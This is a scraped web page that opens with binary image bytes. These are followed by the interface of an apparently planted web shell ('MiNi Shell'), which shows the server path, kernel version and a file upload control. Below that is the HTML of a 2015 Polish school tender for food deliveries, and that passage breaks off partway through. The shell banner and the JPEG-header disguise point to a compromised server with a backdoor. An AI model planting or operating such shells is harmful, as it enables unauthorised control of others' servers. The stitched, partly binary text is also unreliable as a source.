JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151216/345390-N-2015.html

<p class="kh_header"><b>Padew Narodowa: Dostawa artykułów spożywczych dla Zespołu Szkół w Padwi Narodowej w Padwi Narodowej</b><br>
<b>Numer ogłoszenia: 345390 - 2015; data zamieszczenia: 16.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół w Padwi Narodowej , ul. Szkolna 1, 39-340 Padew Narodowa, woj. podkarpackie, tel. 15 811 99 48, faks 15 811 99 48.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www: padewgimnazjum.cba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych dla Zespołu Szkół w Padwi Narodowej w Padwi Narodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa artykułów spożywczych dla Zespołu Szkół w Padwi Narodowej w Padwi Narodowej.
Zamawiający dopuszcza możliwość składania ofert częściowych na poszczególne zadania: 
Zadanie nr 1	Dostawa pieczywa dla Zespołu Szkół w Padwi Narodowej
Zadanie nr 2	Dostawa mięsa i wędlin dla Zespołu Szkół w Padwi Narodowej 
Zadanie nr 3	Dostawa owoców, warzyw i kiszonek dla Zespołu Szkół
w Padwi Narodowej
Zadanie nr 4	Dostawa zup, przypraw i dżemów dla Zespołu Szkół w Padwi Narodowej
Zadanie nr 5	Dostawa mąki i artykułów mącznych dla Zespołu Szkół
w Padwi Narodowej
Zadanie nr 6	Dostawa nabiału dla Zespołu Szkół w Padwi Narodowej
Zadanie nr 7	Dostawa mrożonek dla Zespołu Szkół w Padwi Narodowej
Zadanie nr 8	Dostawa ziemniaków dla Zespołu Szkół w Padwi Narodowej

Dostarczony przedmiot zamówienia powinien spełniać następujące wymogi: 
- poszczególne asortymenty pakowane oddzielnie, 
- dostawy realizowane pojazdem dostosowanym do przewożenia poszczególnych art. spożywczych,
- przy każdorazowej dostawie wykonawca zobowiązany jest do przedstawienia zamawiającemu orzeczenia o spełnieniu warunków sanitarnych dostarczanych artykułów spożywczych wydanego przez właściwą stację sanitarno-epidemiologiczną, oraz orzeczenia o spełnianiu warunków sanitarnych przez pojazd którym realizowana jest dostawa,
- produkty pakowane mają być trwale i czytelnie oznaczone terminem przydatności do spożycia,
- termin przydatności do spożycia wg dnia dostawy nie może być krótszy niż 30 % terminu przydatności dla danego typu produktu
- dostawy będą realizowane sukcesywnie w miarę zapotrzebowania Zamawiającego

Zadanie nr 1-Dostawa pieczywa dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Bułki zwykłe (0,08 kg)	szt	800
2	Rogale (0,08kg)	szt	4 000
3	Bułka tarta	kg	165
4	Bułka drożdżowa (0,10kg)	szt	1 200
5	Pączek (0,10 kg)	szt	 500
6	Chleb graham (0,5 kg)	szt.	2 500
7	Bułka ciemna z ziarnami (0,12kg)	szt.	1 600

Zadanie nr 2-Dostawa mięsa i wędlin dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa 	Nazwa 
JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna	kg	100
2	Wędzonka	kg	130
3	Kości	kg	900
4	Porcja rosołowa	kg 	900
5	Schab b/k	kg	630
6	Filet z piersi kurczaka	kg	800
7	Karkówka b/k	kg	820
8	Kiełbasa krakowska podsuszana	kg	31
9	Kiełbasa żurkowa	kg 	125
10	Boczek wędzony surowy	kg	38
11	Rosołowe wołowe	kg	75
12	Smalec wiejski	kg	125
13	Pasztetówka wiejska 	kg	10
14	Dramstik (podudzie  z  kurczaka)	kg	280
15	Gulaszowe wołowe	kg	300
16	Szynka hrabiego	kg	63

Zadanie nr 3-Dostawa owoców, warzywa i kiszonek dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	600
2	Pietruszka korzeń	kg	250
3	Seler korzeń	kg	250
4	Por	szt	250
5	Cebula	kg	650
6	Burak ćwikłowy	kg	300
7	Kapusta biała główki 	szt	200
8	Kapusta pekińska 	szt	200
9	Barszcz kiszony 0,5 l	szt	250
10	Ogórek świeży 	kg	190
11	Papryka świeża	kg	75
12	Ogórki kiszone 	kg	63
13	Kapusta kiszona	kg	400
14	Koperek zielony, pęczek	szt	60
15	Pieczarki	kg	63
16	Czosnek	szt	190
17	Jabłka mix	kg	700
18	Cytryny	kg	100
19	Fasola Jasiek	kg	80
20	Pomidor świeży	kg	120
21	Groch żółty, łuskany	kg	40
22	Ogórki korniszony, 1,7 l	szt	200
23	Sałata zielona, główka	szt	50
24	Pietruszka zielona, pęczek	szt	100
25	Mandarynki	kg	400
26	Truskawki świeże	kg	65

Zadanie nr 4-Dostawa zup, przypraw i dżemów dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Papryka mielona słodka 	kg	3
2	Majonez dekoracyjny 3000g lub 3 l	szt	90
3	Kwasek cytrynowy 50g	szt	40
4	Majeranek 	kg	2
5	Ziele angielskie 	kg	4
6	Przyprawa maggi 1 l	szt	38
7	Koncentrat pomidorowy 0,9 	l	szt	500
8	Liść laurowy 	kg	1,5
9	Kminek cały 	kg	1,5
10	Jarzynka	kg	70
11	Rosół drobiowy 	kg	6
12	Sos pieczeniowy 	kg	18
13	Sos grzybowy 	kg	8
14	Zupa grochowa 	kg	7
15	Zupa grzybowa 	kg	7
16	Barszcz biały 	kg	25
17	Żur w proszku 	kg	25
18	Czosnek w proszku	kg	 2
19	Olej 1 l ( rzepakowy, z pierwszego tłoczenia, filtrowany na zimno) l	100
20	Olej uniwersalny 5 l 	l	300
21	Cukier kryształ 1kg	kg	1 200
22	Herbata w ekspresowa ,100 saszetek	op	450
23	Przyprawa do  mięs 	kg	20
24	Sól  1 kg	kg	170
25	Chrzan tarty w słoiku 180g	szt	85
26	Ocet ? l	szt	25
27	Pieprz czarny mielony 	kg	7,5
28	Bazylia suszona 	kg	0,5
29	Delikat  do ryb 	kg	2,5
30	Sos sałatkowy grecki 	kg	2
31	Kminek mielony 	kg	2
32	Sos pieczakowo-borowikowy	kg	6
33	Pomidory całe 2,5 kg puszka	szt	50
34	Przyprawa pomidory, czosnek, bazylia	kg	3
35	Imbir mielony 250 g	kg	2
36	Sos sojowy ciemny TAO 592 ml	szt	8
37	Sos sałatkowy koperkowy 	kg	2
38	Ocet balsamiczny 250 ml	szt	8

Zadanie nr 5-Dostawa mąki i artykułów mącznych dla Zespołu Szkół w Padwi Narodowej

Lp.   	Nazwa	Nazwa JM	Ilość
1	2	3	      4
1	Kasza manna 500g	kg	   40
2	Kasza jęczmienna 1000g 	kg	   270
3	Ryż biały 1 kg	kg	   200
4	Makaron spaghetti op.500g	szt	   500
5	Makaron świderki op.500g	szt	   700
6	Makaron muszelka op.250g	szt	     100
7	Makaron nitka (5-cio jajeczny) op. 250g	szt	    440
8	Mąka pszenna 1000g	kg	260

Zadanie nr 6-Dostawa nabiału dla Zespołu Szkół w Padwi Narodowej
		
Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Śmietana 18%  400g	szt	1 100
2	Masło    200g	szt	 1 500
3	Ser biały półtłusty 	kg	200
4	Jajka	szt	8 000
5	Ser żółty salami	kg	   35
6	Jogurt wieloowocowy pitny 150 g	szt.	1 500

Zadanie nr 7-Dostawa mrożonek dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Paluszki rybne (FROSTA lub równoważne)	kg	252
2	Pierogi ruskie 450g (SWISS-POL lub równoważne)	szt	3 060
3	Kalafior mrożony 2000g	kg	38
4	Mieszanka wielowarzywna 2500g	kg	150
5	Brokuły mrożone 2000g	kg	50
6	Fasolka szparagowa żółta 2500g	kg	37,5
7	Fasola szparagowa zielona 2500g	kg	37,5
8	Filet z ryby Limanda	kg	200
9	Filet z ryby (Miruna) SHP BS	kg	336

Zadanie nr 8-Dostawa ziemniaków dla Zespołu Szkół w Padwi Narodowej

Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Ziemniaki	kg	  6 500.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.11.00.00-2, 15.13.11.30-5, 15.22.00.00-6, 03.20.00.00-3, 03.21.13.00-6, 03.21.21.00-1, 03.14.25.00-3, 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4, 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9, 15.51.00.00-0, 15.53.00.00-2, 15.54.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz cenowy, wykaz osób do kontaktów z zamawiającym, zaakceptowany projekt umowy, wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.padewgimnazjum.cba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół w Padwi Narodowej
ul. Szkolna 1
39-340 Padew Narodowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2015 godzina 09:00, miejsce: Zespół Szkół w Padwi Narodowej
ul. Szkolna 1
39-340 Padew Narodowa
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa pieczywa dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Bułki zwykłe (0,08 kg)	szt	800
2	Rogale (0,08kg)	szt	4 000
3	Bułka tarta	kg	165
4	Bułka drożdżowa (0,10kg)	szt	1 200
5	Pączek (0,10 kg)	szt	 500
6	Chleb graham (0,5 kg)	szt.	2 500
7	Bułka ciemna z ziarnami (0,12kg)	szt.	1 600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa mięsa i wędlin dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mięsa i wędlin dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa 	Nazwa 
JM	Ilość
1	2	3	4
1	Kiełbasa zwyczajna	kg	100
2	Wędzonka	kg	130
3	Kości	kg	900
4	Porcja rosołowa	kg 	900
5	Schab b/k	kg	630
6	Filet z piersi kurczaka	kg	800
7	Karkówka b/k	kg	820
8	Kiełbasa krakowska podsuszana	kg	31
9	Kiełbasa żurkowa	kg 	125
10	Boczek wędzony surowy	kg	38
11	Rosołowe wołowe	kg	75
12	Smalec wiejski	kg	125
13	Pasztetówka wiejska 	kg	10
14	Dramstik (podudzie  z  kurczaka)	kg	280
15	Gulaszowe wołowe	kg	300
16	Szynka hrabiego	kg	63.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.13.11.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa owoców, warzywa i kiszonek dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców, warzywa i kiszonek dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa 	Nazwa JM	Ilość
1	2	3	4
1	Marchew czerwona korzeń	kg	600
2	Pietruszka korzeń	kg	250
3	Seler korzeń	kg	250
4	Por	szt	250
5	Cebula	kg	650
6	Burak ćwikłowy	kg	300
7	Kapusta biała główki 	szt	200
8	Kapusta pekińska 	szt	200
9	Barszcz kiszony 0,5 l	szt	250
10	Ogórek świeży 	kg	190
11	Papryka świeża	kg	75
12	Ogórki kiszone 	kg	63
13	Kapusta kiszona	kg	400
14	Koperek zielony, pęczek	szt	60
15	Pieczarki	kg	63
16	Czosnek	szt	190
17	Jabłka mix	kg	700
18	Cytryny	kg	100
19	Fasola Jasiek	kg	80
20	Pomidor świeży	kg	120
21	Groch żółty, łuskany	kg	40
22	Ogórki korniszony, 1,7 l	szt	200
23	Sałata zielona, główka	szt	50
24	Pietruszka zielona, pęczek	szt	100
25	Mandarynki	kg	400
26	Truskawki świeże	kg	65.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3, 03.22.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa zup, przypraw i dżemów dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa zup, przypraw i dżemów dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Papryka mielona słodka 	kg	3
2	Majonez dekoracyjny 3000g lub 3 l	szt	90
3	Kwasek cytrynowy 50g	szt	40
4	Majeranek 	kg	2
5	Ziele angielskie 	kg	4
6	Przyprawa maggi 1 l	szt	38
7	Koncentrat pomidorowy 0,9 	l	szt	500
8	Liść laurowy 	kg	1,5
9	Kminek cały 	kg	1,5
10	Jarzynka	kg	70
11	Rosół drobiowy 	kg	6
12	Sos pieczeniowy 	kg	18
13	Sos grzybowy 	kg	8
14	Zupa grochowa 	kg	7
15	Zupa grzybowa 	kg	7
16	Barszcz biały 	kg	25
17	Żur w proszku 	kg	25
18	Czosnek w proszku	kg	 2
19	Olej 1 l ( rzepakowy, z pierwszego tłoczenia, filtrowany na zimno )	l	100
20	Olej uniwersalny 5 l 	l	300
21	Cukier kryształ 1kg	kg	1 200
22	Herbata w ekspresowa ,100 saszetek	op	450
23	Przyprawa do  mięs 	kg	20
24	Sól  1 kg	kg	170
25	Chrzan tarty w słoiku 180g	szt	85
26	Ocet ? l	szt	25
27	Pieprz czarny mielony 	kg	7,5
28	Bazylia suszona 	kg	0,5
29	Delikat  do ryb 	kg	2,5
30	Sos sałatkowy grecki 	kg	2
31	Kminek mielony 	kg	2
32	Sos pieczakowo-borowikowy	kg	6
33	Pomidory całe 2,5 kg puszka	szt	50
34	Przyprawa pomidory, czosnek, bazylia	kg	3
35	Imbir mielony 250 g	kg	2
36	Sos sojowy ciemny TAO 592 ml	szt	8
37	Sos sałatkowy koperkowy 	kg	2
38	Ocet balsamiczny 250 ml	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.87.20.00-1, 15.83.12.00-4, 15.86.41.00-3, 15.89.10.00-0, 15.41.12.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa mąki i artykułów mącznych dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mąki i artykułów mącznych dla Zespołu Szkół w Padwi Narodowej
Lp.   	Nazwa	Nazwa JM	Ilość
1	2	3	      4
1	Kasza manna 500g	kg	   40
2	Kasza jęczmienna 1000g 	kg	   270
3	Ryż biały 1 kg	kg	   200
4	Makaron spaghetti op.500g	szt	   500
5	Makaron świderki op.500g	szt	   700
6	Makaron muszelka op.250g	szt	     100
7	Makaron nitka (5-cio jajeczny) op. 250g	szt	    440
8	Mąka pszenna 1000g	kg	260.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.61.21.00-2, 15.85.11.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa nabiału dla Zespołu Szkół w Padwi Narodowej.</p>
